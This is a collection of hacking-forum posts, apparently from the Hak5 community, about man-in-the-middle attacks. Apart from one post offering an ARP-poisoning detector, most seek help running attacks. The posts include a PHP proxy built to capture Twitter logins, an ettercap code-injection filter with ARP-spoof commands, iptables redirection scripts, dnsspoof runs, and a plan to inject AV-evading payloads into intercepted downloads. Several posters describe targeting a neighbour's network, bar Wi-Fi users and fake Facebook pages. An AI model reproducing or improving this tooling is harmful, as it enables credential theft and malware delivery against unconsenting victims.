Search the Community

Hi, I am a complete noob to everything ever so just please bear with me. I want to buy myself a basic laptop which will allow me to begin learning to hack - I have a strong knowledge of computers and want to learn Internet security and pentesting properly. I have a £450-£500 budget and I maybe can push it if needed. I want to be running Kali Linux on it and I will be partitioning a drive to get to that. I was hoping for a 15.6" screen, i5, 8gb RAM and a 1TB HDD with as much battery life as possible. I have seen normal laptops with this for £400 so I think I can get this. My real question is if there are any things I will NEED to get me started; for example I know certain wireless cards make pentesting much easier but I don't know which models or which laptops contain them (I was hoping not to buy an external one). I guess if need be I can change a wireless card but I would like to stay away from fiddling with internals. Any suggestions/help would be greatly appreciated. Thanks, MrJaMilne

What is the best way to protect me against MITM attacks under a public network?

Hi, I don't post a lot on this forums but I made a cool script that protects a linux box from gateway ARP Poisoning attacks (it does it instantly, without a 5 second poll delay like other scripts). All details are on the github repo: https://github.com/Prodicode/ARPPD All feedback is appriciated! This was my first security project in C.

Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.

Hi everyone, I use the Wi-Fi pineapple as a man in the middle Device Redirecting all traffic to a Laptop That the Wi-Fi pineapple is tethered to, Similar to this setup: https://www.evilsocket.net/2016/09/15/WiFi-Pineapple-NANO-OS-X-and-BetterCap-setup/ So here's my setup, MacBook running linux VM (Virtual box) Connected via USB To the Wi-Fi pineapple That's sending all traffic To the virtual box Machine : Pardon my diagram skills :( Here describe that I have created Based off of the post Above, HoweverI don't think this is ideal since you would need to ssh into the pineapple to run this script every time. Ideally it would be best to do this via the web interface of the pineapple via a simple "enable proxy" button etc. Any feedback would be appreciated. #!/bin/bash if [[ $# -eq 0 ]] ; then echo "Usage: $0 (enable|disable)" exit 1 fi action="$1" case $action in enable) echo "Enabling ..." iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080 #iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083 iptables -t nat -A POSTROUTING -j MASQUERADE ;; disable) echo "Disabling ..." iptables -t nat -D PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.42:8080 #iptables -t nat -D PREROUTING -p tcp --dport 443 -j DNAT --to-destination 172.16.42.42:8083 ;; *) echo "Usage: $0 (enable|disable)" exit 1 ;; esac

Hello, I hope my video will help you understand how hackers can man in the middle attack and one of their tools they can use. Look what they can do with Xerosploit.

Hi I test the ssh mitm by the way this link. I have three PC ;attacker PC,ssh server and ssh client.After all instruction are made, I connect ssh to server from client .But when I do this , I cannot login with user from server. I can only login with attacker 's username and password and get logined to attacker pc.It means that attacker pc doesnot redirect to ssh server. But I have completed all instructions described in that link. If you have time, please check my question and answer me.

After using MITMf for a while on my Kali Linux machine, I'm wondering whether it would be feasible to use it on a Bash Bunny. You'd have to be able to pull things like the gateway and DNS server automatically, but beyond that the only problem I can think of is the complex dependencies for MITMf. Thoughts?

I'm trying to perform a javascript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are before 2016, I am not sure if this kind of attack still works now? Anyway, this is my filter script if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "<head>")) { replace("<head>", "<HEAD>"); msg("Code injected"); } } And I run it as ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100// test.ef is the compiled filter file. When the victim opens any web page, I got a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the html source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part, if (ip.proto == TCP && tcp.dst == 80) { replace("<head>", "<HEAD>"); msg("Code injected"); } "Code injected" message shows, but html code on the web client is not changed, which means, the problem is that the filter cannot find any named strings (in this case <head>) in the html file, it can only deal with the header (Accept-Encoding). Does anyone know a solution or work around, please, any suggestions will be appreciated, thanks

Hello Hak5 members, New to this site and platform, but am pretty excited to be back in the states and to get my hands on the Tetra I purchased. When looking at modules I can't seem to find something similar to the MITMf framework integrated into it. This takes use of filepwn, but I have been having a great experience using Shellter. Where should I go for learning how to integrate a new module into the Pineapple? Here is what I am wanting: 1. Client makes request for .exe file 2. Pineapple forwards to the web server 3. Web server responds 4. Pineapple receives the traffic: If (PARAMS == TRUE): Pass the executable over to Shellter, inject a payload, then forward to the client. else: forward to the client Some of the params you would setup would be maximum file size (to make sure the process doesn't take too long), if the program is already wrapped, etc. Ideally, one would be running some sort HTTPS downgrade attack, or SSL Stripper, so the probability of injection is higher as most sites now use https. Shellter has been awesome for me when it comes to AV evasion, but it may also be perfect to allow user's to pipe the executable to whatever program they want to handle the payload injection and just have the module looking for the created file to popup in a specific location.

Hey all, The Tetra allows us to do so many great things. We can spoof the SSID and make a Client think they are connecting to a "known" AP. The Client has the WPA2 password stored to automatically connect to its "known" AP. Why can't we spoof the SSID (and MAC if necessary) but also prompt for a passkey (WEP/WPA/WPA2 depending on the legitimate AP) and sniff the passkey that the Client sends? I have a feeling the issue has to do with hashing done at each sides of the 4-way handshake. It just seems like we should be able to MitM some of this. Appreciate anyones input and teaching my like i'm 5 If the answer is something like "we do see all the hashes, which is why you then have to brute force/dictionary them to turn to clear text", then why are we unable to "pass the hash" with Wifi.

Hi guys! I recently wanted to get interrested in deploying a MITM attack in my home network. I firstly used SSLSplit and ettercap from the Pineapple Web Interface (which is a little bit buggy sometimes). From there, the attack worked 1/3 of the time. Then I tried to do this from the CLI. ettercap seems to work pretty well (ettercap -Tqi wlan1 -M arp:remote // //) but I didn't managed to get SSLStrip working... And if I try to run SSLStrip from the GUI, the certs are signed by "SSLStrip", which cause security warnings. Is there a way to generate customs certs and pass them to the SSLStrip GUI? Thanks! PS: I observed that when the attack is going on, it's really slow to browse the internet... Is it normal? Sorry for my bad english

Hallo, I have one question about the Lan Turtle. When i connect the Lan turtle in a PC from a "big" network so the lan turtle has acces to the network, doesnt it? When i want to start a MITM attack, have the target device only be in the same network or should i connect the lan turtle directly to the targetet device? So for example i plug in the lan turtle in "PC206" and i want to attack the "PC259" does it works or should i plug in the turtle in PC259? I Hope you understand my question :) Thanks in advice, Simon PS: sorry for my bad englisch, im not a native speaker

Hello, I was wondering what are the different techniques you guys use for a man in the middle attack. Just for something to learn and advance on. Thanks.

Is there any possible ways of doing MITM attacks that would take usernames and passwords. When I try to use Xerosploit, PytheM, or even bettercap. None of these methods work on websites such as Facebook, Twitter, Paypal, Gmail, etc. Is there any new methods that is the latest that is working right now?

Hi, I did a pentest in a LAN, some weird things happened. This LAN is a little unusual, there are two routers, say A and B, A is directly connected to an optical fiber, doing PPPoE, to the WAN, it has a gateway of 192.168.1.1, B is connected to A, wireless router, with a gateway of 192.168.0.1. All the clients and my Kali machine are connected to B. Target has an IP of 192.168.0.104 Here is what I did with Kali, I use the following to arp spoof the target and router B arpsoof -i eth0 -t 192.168.0.1 192.168.0.104 arpsoof -i eth0 -t 192.168.0.104 192.168.0.1 sysctl -w net.ipv4.ip_forward=1 Then I did a Dns Spoof with dnsspoof -i eth0 -f dnshost.spoof It did not work, all the traffic went through my Kali, but the target was still able to access the original webpage. And here comes the weird thing. I stopped the dnsspoof, stopped the ip forwarding sysctl -w net.ipv4.ip_forward=0 and I started the exactly the same exact dnsspoof as last time again, it worked! This really confused me, because after that, I tried to start arpspoof and dnsspoof without setting ip_forward to 1 at all, I left it to be the default 0, and it did not work, because the arp traffic was not working (which is excepted!!). ArpSpoof and dnsspoof both work ONLY IF the process "ip forwarding is firstly enabled and then disabled" completed once, before launching dnsspoof. Ip forwarding only on gives dnsspoof not working, ip forwarding only always off gives arpspoof not working. Besides that, two more strange things I failed to understand. 1, Sometimes, the "ip forward on and off" cycle must be done in the same terminal where the dnsspoof takes place, in order to make it work. Switching on then off in another terminal simply leads to arpspoof failure. 2, Here is the log/feedback of a DnsSpoof root@kali:~# dnsspoof -i eth0 -f dnshost.spoof dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113] 192.168.0.104.62290 > 192.168.1.1.53: 4678+ A? www.youtube.com 192.168.0.104.62290 > 192.168.0.1.53: 4678+ A? www.youtube.com 192.168.0.104.65063 > 192.168.1.1.53: 31827+ A? www.youtube.com 192.168.0.104.65063 > 192.168.0.1.53: 31827+ A? www.youtube.com 192.168.0.104.55426 > 192.168.1.1.53: 51608+ A? www.sina.com 192.168.0.104.55426 > 192.168.0.1.53: 51608+ A? www.sina.com 192.168.0.104.54794 > 192.168.1.1.53: 5651+ A? www.sina.com 192.168.0.104.54794 > 192.168.0.1.53: 5651+ A? www.sina.com 192.168.0.104.60485 > 192.168.1.1.53: 2950+ A? www.sina.com 192.168.0.104.63394 > 192.168.1.1.53: 41196+ A? www.facebook.com 192.168.0.104.63394 > 192.168.0.1.53: 41196+ A? www.facebook.com 192.168.0.104.52953 > 192.168.1.1.53: 6912+ A? www.facebook.com 192.168.0.104.52953 > 192.168.0.1.53: 6912+ A? www.facebook.com ^Croot@kali:~# dnsspoof -i eth0 -f dnshost.spoof dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.0.113] 192.168.0.104.53807 > 192.168.1.1.53: 60485+ A? www.youtube.com 192.168.0.104.53807 > 192.168.1.1.53: 60485+ A? www.youtube.com 192.168.0.104.50239 > 192.168.1.1.53: 28894+ A? www.sina.com 192.168.0.104.50239 > 192.168.1.1.53: 28894+ A? www.sina.com The second launch was a failed one, the first one succeeded. The router I am targeting should be 192.168.0.1, as the router B, in the second launch, it is interacting with only router A (192.168.1.1), I am not sure what does that mean and if it has something to do with the failure directly, because in the next few attempts, a feedback situation like this second launch worked sometimes. I am almost 100% sure this issue was due to the two routers, but I am still not able to understand why, or even find a way to make it always work. Please, any suggestion will be appreciated! Thanks

Hey guys, I'm partially new here, just wanted a little bit of help with MiTM attack. Suppose, I successfully cracked my Neighbours WiFi using Evil Twin method and now I want to Man In Middle his smart phone or his whole network, is it possible? My question here is that most of us nowadays use smart phones to use Facebook, E-mails etc and not just go to browser and then facebook.com right? So is that possible? Thanks! :confused:

I am completely and utterly disappointed. i have been searching for weeks to find out how to preform a arp-poising MITM attack to sniff plain text credentials, the best thing i could find was Responder. There is no guide on how to use this explicitly on the WiFi Pineapple. I have basically paid $250 for a box. The last person to ask about this did not get anywhere in terms of help either. Please Can somebody in this entire forum show me how i can configure Responder to work on a Wireless network. Like from the ground level. What options do i select, do i connect in client mode (Wlan1, Wlan0) ect. Please, this was a big investment for me.

Hello Wonderful People, So I'm hitting a snag with an attack I'm trying to carry out and could really use anyone's help trying to troubleshoot this. I've got the theory down and get half way but can't seem to jump the last hurdle. So here's the jist, I'm trying to MitM devices connecting to my TETRA using Burp Suite to capture any HTTP or HTTPS traffic so that I can observe/modify (you know the drill) the HTTP/S traffic. Thing is, I can capture the traffic and MitM successfully with the TETRA (I am able to see all traffic passing through my attack machine within Wireshark). However, I can't seem to get that traffic into Burp. I'm only interested in sending HTTP/S traffic to Burp, all other traffic can head on out to the Internet. I've tried using iptables rules to preroute the traffic bound for dport 80 or 443 to the Burp Proxy listening on 8080 (and tried individual listeners on 80 and 443 to no avail), but no traffic seems to get to it... well to an extent. If I grab the HTTP header of google.com whilst routing traffic to Burp, I can grab a HTTP header for Burp itself. Here's a diagram because I like making them: Attackers IP (Eth1) is 172.16.42.42 Eth0 IP is 192.168.0.10 (LAN has Internet connectivity via gateway at 192.168.32.1) ETH0 and 1 are wired (I wire into the ETH port of my TETRA). Mobile devices are connecting via WiFi (PineAP). It's simple enough in my head, have all traffic coming in over ETH1 that is destined for 80 ro 443 re-route to the Burp Listener... but it doesn't seem to work correctly. Here's the iptables rules I was creating to try and route the traffic (applied on the attackers machine): iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 127.0.0.1:8080 iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to 127.0.0.1:8080 And ip forwarding is enabled on the attackers machine with: sysctl net.ipv4.ip_forward=1 I'm still trying out stuff, next thing is to route HTTP/S traffic from ETH1 to LO (seeing as the listener is on LO 127.0.0.1:8080), but I know from previous posts their are legends on these forums and would appreciate some pokes in the right direction if anyone has any ideas. And yes, I did look around the forums and on the Internet, but I can't seem to find the thing that works. Any thoughts are welcome. Think this might be a cool addition to the forums if we can get it going. Thanks.

Hey everyone, I am wondering if you guys have any specific steps you take once you are the MITM? What kind of things are you trying to do with the packets? Push java applets to clients? Use Karmetaspolit? Since SSLStrip is no longer working, what types of things are you doing to gaurentee the most data out of your "victims". I am particularly intrested in emails, social media, etc... Assuming its been approved by the client I am auditing. I really want to show some examples of what can go wrong for a client site when a MITM attack is successfully executed using the pineapple, any ideas?

Can we bypassing HSTS by using this MITM technique? The attack works on latest versions of iOS including iOS 8.1.1 and On most Android devices. Source: https://blog.zimperium.com/doubledirect-zimperium-discovers-full-duplex-icmp-redirect-attacks-in-the-wild/

Here's something I've been thinking about for a long time: you know when you go into a bar, ask for the wifi password and notice that the router has the default user and pass set? How easy if at all possible would it be to somehow sniff that traffic from somewhere else? Maybe it's even possible to automate things like capturing certain types of packages, cookies or even capture some credentials? Maybe I'm way off, I'm a complete rookie in this field. In that case I'd be very grateful if somebody explained why it can't be done! Thanks in advance!

hiii i have make some fake pages for known pages like Facebook etc i have also install dnsmasq in Kali and setup Apache server and every thing is okay now when the victim visit Facebook in chrome for example it will told him that this is unsecured cuz of https is there any way or tools in Kali to avoid that or any other thing would be greet thanks :)

I remember an older episode of Hak5 when Darren was showing some fun with a MITM. He actually had an application that was reconstructing the packets as they flowed through his laptop and reconstructed the webpage that the user was surfing.Anyone remember that episode? And for icing on the cake he did some text manipulation (like flipping the text upside down, or changing certain words. etc) so the user was seeing a 'modified' version of the web page.

A while back Em3rgency from Top-Hat-Sec created a script that worked in BackTrack. I recently modified it to work in Kali. Check it out for your Fake AP pleasure. Check out my blog for the script at http://goo.gl/UFYMg3 http://wp.me/p479Vp-1p instead. Let me know if you run into any problems running it.